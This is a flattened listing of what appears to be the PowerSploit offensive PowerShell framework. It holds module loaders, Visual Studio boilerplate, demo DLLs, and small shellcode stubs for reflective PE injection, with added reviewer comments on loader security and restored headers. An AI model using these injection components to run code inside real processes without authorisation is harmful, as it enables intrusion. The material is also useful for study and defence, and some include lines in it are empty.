├── Capstone ├── lib │ ├── place_capstone.dll_here │ ├── x64 │ │ ├── place_64-bit_libcapstone.dll_here │ │ └── libcapstone.dll │ ├── x86 │ │ ├── place_32-bit_libcapstone.dll_here │ │ └── libcapstone.dll │ └── capstone.dll ├── README ├── Capstone.psd1 ├── LICENSE.TXT ├── Get-CSDisassembly.format.ps1xml └── Capstone.psm1 ├── Recon ├── Recon.psm1 ├── Dictionaries │ ├── generic.txt │ ├── sharepoint.txt │ └── admin.txt ├── Usage.md ├── Recon.psd1 └── Get-HttpStatus.ps1 ├── PETools ├── PETools.psm1 ├── Usage.md ├── Get-LibSymbols.format.ps1xml └── PETools.psd1 ├── CodeExecution ├── CodeExecution.psm1 ├── Invoke-ReflectivePEInjection_Resources │ ├── DemoDLL │ │ ├── DemoDLL │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── dllmain.cpp │ │ │ ├── stdafx.h │ │ │ ├── DemoDLL.h │ │ │ ├── DemoDLL.vcxproj.filters │ │ │ ├── ReadMe.txt │ │ │ └── DemoDLL.cpp │ │ └── DemoDLL.sln │ ├── DemoExe │ │ ├── DemoExe_MD │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── DemoExe_MD.cpp │ │ │ ├── DemoExe_MD.vcxproj.filters │ │ │ └── ReadMe.txt │ │ ├── DemoExe_MDd │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── DemoExe_MDd.cpp │ │ │ ├── DemoExe_MDd.vcxproj.filters │ │ │ └── ReadMe.txt │ │ └── DemoExe.sln │ ├── ExeToInjectInTo │ │ ├── ExeToInjectInTo │ │ │ ├── stdafx.cpp │ │ │ ├── ExeToInjectInTo.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── ExeToInjectInTo.vcxproj.filters │ │ │ ├── ReadMe.txt │ │ │ └── ExeToInjectInTo.vcxproj │ │ └── ExeToInjectInTo.sln │ ├── Shellcode │ │ ├── x86 │ │ │ ├── ExitThread.asm │ │ │ ├── CallDllMain.asm │ │ │ └── GetProcAddress.asm │ │ ├── x64 │ │ │ ├── ExitThread.asm │ │ │ ├── CallDllMain.asm │ │ │ ├── LoadLibraryA.asm │ │ │ └── GetFuncAddress.asm │ │ └── readme.txt │ └── DemoDLL_RemoteProcess │ │ ├── DemoDLL_RemoteProcess │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── DemoDLL_RemoteProcess.cpp │ │ ├── stdafx.h │ │ ├── dllmain.cpp │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters │ │ └── ReadMe.txt │ │ └── 
DemoDLL_RemoteProcess.sln ├── Usage.md ├── CodeExecution.psd1 └── Watch-BlueScreen.ps1 ├── Exfiltration ├── Exfiltration.psm1 ├── LogonUser │ └── LogonUser │ │ ├── logon │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── dllmain.cpp │ │ ├── stdafx.h │ │ ├── logon.vcxproj.filters │ │ └── ReadMe.txt │ │ ├── LogonUser │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── LogonUser.vcxproj.filters │ │ ├── ReadMe.txt │ │ └── LogonUser.cpp │ │ └── LogonUser.sln ├── NTFSParser │ ├── NTFSParser │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── NTFS.h │ │ ├── NTFSParser.cpp │ │ ├── ReadMe.txt │ │ └── NTFSParser.vcxproj.filters │ ├── NTFSParserDLL │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── NTFS.h │ │ ├── dllmain.cpp │ │ ├── NTFSParserDLL.vcxproj.filters │ │ ├── ReadMe.txt │ │ └── NTFSParserDLL.cpp │ └── NTFSParser.sln ├── Usage.md ├── Exfiltration.psd1 ├── Get-TimedScreenshot.ps1 └── Out-Minidump.ps1 ├── AntivirusBypass ├── AntivirusBypass.psm1 ├── Usage.md └── AntivirusBypass.psd1 ├── ReverseEngineering ├── ReverseEngineering.psm1 ├── Usage.md ├── ProcessModuleTrace.format.ps1xml ├── Get-ILDisassembly.format.ps1xml ├── ConvertTo-String.ps1 ├── New-Object.ps1 ├── Get-Entropy.ps1 ├── Get-Strings.ps1 ├── ProcessModuleTrace.ps1 ├── ReverseEngineering.psd1 └── Get-MethodAddress.ps1 ├── ScriptModification ├── ScriptModification.psm1 ├── Usage.md ├── Out-CompressedDll.ps1 ├── ScriptModification.psd1 ├── Out-EncryptedScript.ps1 └── Remove-Comments.ps1 ├── PowerSploit.psm1 ├── Persistence ├── Persistence.psm1 ├── Usage.md ├── Persistence.psd1 ├── New-UserPersistenceOptions.ps1 └── New-ElevatedPersistenceOptions.ps1 ├── LICENSE ├── Staging └── Get-MacAttribute.ps1 ├── .gitignore └── PowerSploit.psd1 /Capstone/lib/place_capstone.dll_here: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/Capstone/lib/x64/place_64-bit_libcapstone.dll_here:
--------------------------------------------------------------------------------
 1 | 
--------------------------------------------------------------------------------
/Capstone/lib/x86/place_32-bit_libcapstone.dll_here:
--------------------------------------------------------------------------------
 1 | 
--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Module loader: dot-sources EVERY *.ps1 found next to this .psm1 into the module scope, so any file dropped into this folder (package tamper, writable share, stale copy) runs at Import-Module time with the importing user's rights. Nothing is hash- or signature-checked - see the note on /PowerSploit.psm1 below.
 2 | 
--------------------------------------------------------------------------------
/PETools/PETools.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader as Recon.psm1: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/Capstone/lib/capstone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/capstone.dll
--------------------------------------------------------------------------------
/ReverseEngineering/ReverseEngineering.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} # Same glob loader: every *.ps1 in this folder is executed at import - see the note on /PowerSploit.psm1.
 2 | 
--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/Capstone/lib/x64/libcapstone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/x64/libcapstone.dll
--------------------------------------------------------------------------------
/Capstone/lib/x86/libcapstone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/x86/libcapstone.dll
--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
 1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking } # Root loader: imports every sub-directory of the checkout as a module, and each of those modules dot-sources every *.ps1 it contains, so `Import-Module PowerSploit` executes every script file in the tree. Nothing here verifies signatures or hashes - whoever can write to this directory tree gets code execution in every session that imports it, so keep it on a path only trusted principals can modify and verify the checkout before loading it. That includes the prebuilt DLLs under Capstone/lib, which this listing references only as raw.githubusercontent.com HEAD URLs of a fork (no pinned version, hash or signature): compare them against an upstream Capstone release before the Capstone module (presumably via Capstone.psm1) loads them into the PowerShell process. -DisableNameChecking only suppresses the non-approved-verb warning; it has no security effect.
 2 | 
--------------------------------------------------------------------------------
/Persistence/Persistence.psm1:
--------------------------------------------------------------------------------
 1 | . (Join-Path $PSScriptRoot New-ElevatedPersistenceOptions.ps1) # Explicit dot-source list (unlike the *.ps1 glob the other modules use): only the three named files are loaded, which is the safer pattern.
 2 | . (Join-Path $PSScriptRoot New-UserPersistenceOptions.ps1)
 3 | . (Join-Path $PSScriptRoot Add-Persistence.ps1) # NOTE(review): Add-Persistence.ps1 is not visible in the tree excerpt at the top of this page (that excerpt omits other scripts too), so confirm it ships with the module - Import-Module Persistence fails on this line if it is absent.
 4 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // logon.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // NTFSParser.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // LogonUser.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any
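// additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // NTFSParserDLL.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // DemoDLL.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // DemoExe_MD.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // DemoExe_MDd.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.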
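 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // ExeToInjectInTo.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | ; Exit stub for a reflectively loaded EXE. The 0x41414141 words are
 5 | ; placeholders the PowerShell script patches with real addresses; the
 6 | ; script carries the assembled bytes, so re-assemble and update it if the
 7 | ; layout here changes.
 8 | _start:
 9 |     ; Set a var to 1, let PS know the EXE is exiting
10 |     mov ebx, 0x41414141
11 |     mov [ebx], byte 0x01
12 | 
13 |     ; Call ExitThread instead of ExitProcess (so the host process is not
14 |     ; torn down). ExitThread expects one stdcall DWORD argument (dwExitCode)
15 |     ; and nothing is pushed here, so the thread's exit code is whatever
16 |     ; happens to sit at [esp] - harmless for this use.
17 |     sub esp, 0x20
18 |     and esp, 0xFFFFFFc0 ; Needed for stack alignment
19 |     mov ebx, 0x41414141
20 |     call ebx
21 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
 1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
 2 | //
 3 | // Dummy target process for the remote-injection demo: it does nothing but
 4 | // block on getchar(), so it stays alive (under a known name) while a DLL is
 5 | // injected into it, and exits when the tester presses Enter.
 6 | #include "stdafx.h"
 7 | // NOTE(review): the header name on the next line was lost in extraction
 8 | // (angle-bracket target stripped); recover it from the repo.
 9 | #include 
10 | 
11 | using namespace std;
12 | 
13 | // Entry point. argc/argv are unused; returns 0 after one keypress.
14 | int _tmain(int argc, _TCHAR* argv[])
15 | {
16 |     printf("Press enter to close.\n");
17 |     getchar();
18 | 
19 |     return 0;
20 | }
21 | 
22 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | 
 3 | global _start
 4 | 
 5 | ; x64 twin of x86/ExitThread.asm. The 0x4141414141414141 qwords are
 6 | ; placeholders the PowerShell script patches; it carries the assembled
 7 | ; bytes, so re-assemble and update it if the layout here changes.
 8 | _start:
 9 |     ; Set a var to 1, let PS know the exe is exiting
10 |     mov rbx, 0x4141414141414141
11 |     mov [rbx], byte 0x01
12 | 
13 |     ; Call ExitThread instead of ExitProcess. The 0xc0 bytes reserved cover
14 |     ; the 0x20-byte shadow space; rcx (dwExitCode) is not set, so the exit
15 |     ; code is whatever rcx held - harmless for this use.
16 |     sub rsp, 0xc0
17 |     and sp, 0xFFf0 ; Needed for stack alignment
18 |     mov rbx, 0x4141414141414141
19 |     call rbx
20 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
 1 | // stdafx.cpp : source file that includes just the standard includes
 2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
 3 | // stdafx.obj will contain the pre-compiled type information
 4 | 
 5 | #include "stdafx.h"
 6 | 
 7 | // TODO: reference any additional headers you need in STDAFX.H
 8 | // and not in this file
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // Including SDKDDKVer.h defines the highest available Windows platform.
 4 | 
 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.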
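 7 | 
 8 | #include <SDKDDKVer.h> // header name restored: the angle-bracket target was stripped when this listing was extracted; the comment above names it
 9 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | // NOTE(review): the two header names below were stripped in extraction and are
11 | // restored from the VS console-app template; they are what DemoExe_MD.cpp's
12 | // printf/_tmain/_TCHAR need - verify against the repo.
13 | #include <stdio.h>
14 | #include <tchar.h>
15 | 
16 | 
17 | 
18 | // TODO: reference additional headers your program requires here
19 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | // NOTE(review): the two header names below were stripped in extraction and are
11 | // restored from the VS console-app template; they are what DemoExe_MDd.cpp's
12 | // printf/_tmain/_TCHAR need - verify against the repo.
13 | #include <stdio.h>
14 | #include <tchar.h>
15 | 
16 | 
17 | 
18 | // TODO: reference additional headers your program requires here
19 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | // NOTE(review): the two header names below were stripped in extraction and are
11 | // restored from the VS console-app template; they are what ExeToInjectInTo.cpp's
12 | // printf/getchar/_tmain/_TCHAR need - verify against the repo.
13 | #include <stdio.h>
14 | #include <tchar.h>
15 | 
16 | 
17 | 
18 | // TODO: reference additional headers your program requires here
19 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | // NOTE(review): the five header names below were lost when this listing was
11 | // extracted (angle-bracket targets stripped); recover them from the repo.
12 | #include 
13 | #include 
14 | #include 
15 | #include 
16 | #include 
17 | 
18 | 
19 | // TODO: reference additional headers your program requires here
20 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | ; Calls the reflectively loaded DLL's entry point once with
 5 | ; DLL_PROCESS_ATTACH. The 0x4141414141414141 qwords are placeholders the
 6 | ; PowerShell script patches; it carries the assembled bytes, so re-assemble
 7 | ; and update the script's byte string after changing this file.
 8 | _start:
 9 |     ; Get stack setup: save rbx and the caller's rsp, reserve the 0x20-byte
10 |     ; shadow space the x64 calling convention gives the callee, then align.
11 |     ; The sub was missing: whenever the and below moved rsp by fewer than
12 |     ; 0x20 bytes, DllMain's home slots overlapped the saved rbx (and the
13 |     ; stack above it), and the mov rsp, rbx at the end could restore garbage.
14 |     ; LoadLibraryA.asm and GetFuncAddress.asm already reserve it this way.
15 |     push rbx
16 |     mov rbx, rsp
17 |     sub rsp, 0x20
18 |     and sp, 0xff00
19 | 
20 |     ; Call DllMain(hModule, DLL_PROCESS_ATTACH, NULL) - args in rcx, rdx, r8
21 |     mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
22 |     mov rdx, 0x1 ; PROCESS_ATTACH
23 |     mov r8, 0x0 ; NULL
24 |     mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
25 |     call rax
26 | 
27 |     ; Fix stack
28 |     mov rsp, rbx
29 |     pop rbx
30 |     ret
31 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "stdafx.h"
 3 | 
 4 | // No-op DllMain: every notification falls through to break and the function
 5 | // reports success, so the loader never fails the attach on this DLL's account.
 6 | BOOL APIENTRY DllMain( HMODULE hModule,
 7 |                        DWORD  ul_reason_for_call,
 8 |                        LPVOID lpReserved
 9 |                      )
10 | {
11 |     switch (ul_reason_for_call)
12 |     {
13 |     case DLL_PROCESS_ATTACH:
14 |     case DLL_THREAD_ATTACH:
15 |     case DLL_THREAD_DETACH:
16 |     case DLL_PROCESS_DETACH:
17 |         break;
18 |     }
19 |     return TRUE;
20 | }
21 | 
22 | 
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | // NOTE(review): the six header names below were lost when this listing was
10 | // extracted (angle-bracket targets stripped); recover them from the repo.
11 | #include 
12 | #include 
13 | #include 
14 | #include 
15 | #include 
16 | #include 
17 | 
18 | 
19 | 
20 | 
21 | 
22 | // TODO: reference additional headers your program requires here
23 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
 1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included because I didn't save it; this should just be for the SUPER easy stuff like moving an address to EAX and returning.
 2 | The 0x41414141 / 0x4141414141414141 immediates in the .asm files are placeholders the PowerShell script overwrites with real addresses. The script carries the assembled bytes, so if you change an .asm file you must re-assemble it and update the script's byte string as well.
 3 | 
 4 | Compile:
 5 | x64:
 6 | nasm -f elf64 FileName.asm
 7 | ld -o FileName FileName.o
 8 | objdump -M intel -d FileName
 9 | 
10 | x86:
11 | nasm -f elf32 FileName.asm   (the original line had no -f; nasm's default flat-binary output is then written as FileName, not FileName.o, so the ld/objdump steps below would have nothing to read)
12 | ld -o FileName FileName.o
13 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.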
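 2 | #include "stdafx.h"
 3 | 
 4 | // Demo DLL for Invoke-ReflectivePEInjection. DllMain does nothing on any
 5 | // notification and reports success, so the loader's DLL_PROCESS_ATTACH call
 6 | // (see Shellcode/*/CallDllMain.asm) returns TRUE.
 7 | BOOL APIENTRY DllMain( HMODULE hModule,
 8 |                        DWORD  ul_reason_for_call,
 9 |                        LPVOID lpReserved
10 |                      )
11 | {
12 |     switch (ul_reason_for_call)
13 |     {
14 |     case DLL_PROCESS_ATTACH:
15 |     case DLL_THREAD_ATTACH:
16 |     case DLL_THREAD_DETACH:
17 |     case DLL_PROCESS_DETACH:
18 |         break;
19 |     }
20 |     return TRUE;
21 | }
22 | 
23 | 
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
 1 | [SECTION .text]
 2 | global _start
 3 | 
 4 | ; Calls the reflectively loaded DLL's entry point once with
 5 | ; DLL_PROCESS_ATTACH. The 0x41414141 words are placeholders the PowerShell
 6 | ; script patches; it carries the assembled bytes, so re-assemble and update
 7 | ; the script if the layout here changes.
 8 | _start:
 9 |     ; Get stack setup: save ebx and the caller's esp, then 16-byte align
10 |     push ebx
11 |     mov ebx, esp
12 |     and esp, 0xfffffff0
13 | 
14 |     ; Call DllMain(hModule, DLL_PROCESS_ATTACH, NULL) - stdcall, so the
15 |     ; arguments are pushed right-to-left
16 |     mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
17 |     mov edx, 0x1 ; PROCESS_ATTACH
18 |     mov eax, 0x0 ; NULL
19 |     push eax
20 |     push edx
21 |     push ecx
22 |     mov eax, 0x41414141 ; Address of DllMain, set by PS
23 |     call eax
24 | 
25 |     ; Fix stack: restoring esp from ebx is correct whether or not the callee
26 |     ; popped its own arguments
27 |     mov esp, ebx
28 |     pop ebx
29 |     ret
30 | 
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
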